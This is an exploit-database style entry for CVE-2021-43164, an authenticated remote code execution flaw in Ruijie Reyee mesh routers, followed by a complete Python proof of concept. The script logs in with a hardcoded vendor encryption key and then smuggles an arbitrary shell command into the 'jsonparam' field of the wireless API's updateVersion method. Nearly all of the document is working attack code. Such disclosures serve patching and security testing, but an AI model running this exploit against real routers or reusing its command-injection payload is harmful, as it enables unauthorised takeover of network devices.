Ruijie Reyee mesh routers with ReyeeOS version 1.55.1915 EW_3.0(1)B11P35 and EW_3.0(1)B11P55 suffer from a remote code execution vulnerability.
9905dae507eb8530625d18dd769fb31462b102ba1ef93e4d98767d53ee920b23
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
# Google Dork: None
# Date: November 1, 2021
# Exploit Author: Minh Khoa of VSEC
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE: CVE-2021-43164
#!/usr/bin/python3
import os
import sys
import time
import requests
import json
def enc(PASS):
key = "RjYkhwzx$2018!"
shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
return os.popen(shell).read().strip()
try:
TARGET = sys.argv[1]
USER = sys.argv[2]
PASS = sys.argv[3]
COMMAND = sys.argv[4]
except Exception:
print("CVE-2021-43164 PoC")
print("Usage: python3 exploit.py <target> <user> <pass> <command>")
print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")
sys.exit(1)
endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
payload = {
"method": "login",
"params": {
"username": USER,
"password": enc(PASS),
"encry": True,
"time": int(time.time()),
"limit": False
}
}
r = requests.post(endpoint, json=payload)
sid = json.loads(r.text)["data"]["sid"]
endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
payload = {
"method": "updateVersion",
"params": {
"jsonparam": "'; {} #".format(COMMAND)
}
}
r = requests.post(endpoint, json=payload)
print(r.text)